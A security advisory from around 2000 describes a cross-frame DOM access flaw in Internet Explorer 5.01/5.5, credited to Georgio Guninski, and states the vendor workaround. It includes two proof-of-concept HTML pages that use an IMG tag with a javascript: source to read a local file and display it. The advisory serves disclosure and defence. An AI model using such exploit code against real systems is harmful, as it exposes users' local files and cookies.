IE Allows Access to Domain Object Model

 
IE Allows Circumvention of Domain Security
Reported January 8, 2000 by
Georgio Guninski

VERSIONS AFFECTED
Internet Explorer 5.01

DESCRIPTION

Internet Explorer 5.01 under Windows 95 and 5.5 under WinNT 4.0 (suppose other versions are also vulnerable) allows circumventing "Cross Frame Security Policy" by accessing the DOM of "old" documents using <IMG SRC="javascript:..."> and a design flaw in IE.

This exposes the whole DOM of the target document and opens lots of security risks. The problem allows reading local files, reading files from any host, window spoofing, getting cookies, etc.

This is a strange exploit. If you open a new document in a window that contains an old document, the old document"s DOM may be accessed by the new document until the new document is completely parsed and displayed. Looks like IE keeps the old document until the new document is finally parsed and displayed.

If you put a <IMG SRC="javascript:..."> in the new document, it has
access to the old document"s DOM.

DEMONSTRATION

-----------------img2main.html-------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\\test.txt and it will be read and shown in a message box");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links\[0\].click()",2000);
</SCRIPT>
--------------------------------------------

----------------img2.html-------------------
<HTML>
<IMG SRC="javascript:a=window.open("javascript:alert(\"Here is your file: \"+opener.document.body.innerText)");alert("Just an alert, but it is necessary. Wait a little.")">
</HTML>
--------------------------------------------

A live demonstration is available at http://www.nat.bg/~joro/img2main.html

VENDOR RESPONSE

Microsoft is aware of this issue however no response was known at the time of this writing. To prevent this issue from affecting your systems, disable Active Scripting in the browser.

CREDITS
Discovered by
Georgio Guninski

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish